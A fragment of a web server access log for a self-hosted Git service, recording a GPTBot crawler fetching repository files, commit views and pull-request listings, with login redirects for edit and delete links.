"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:17:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:17:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:17:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:17:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:17:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:17:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:17:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:17:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:17:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11057] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20345] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20350] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20319] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9784] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16201] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9910] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17193] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10119] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 15417] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10048] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:17:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:17:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:19:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17504] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:17:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:17:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10118] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 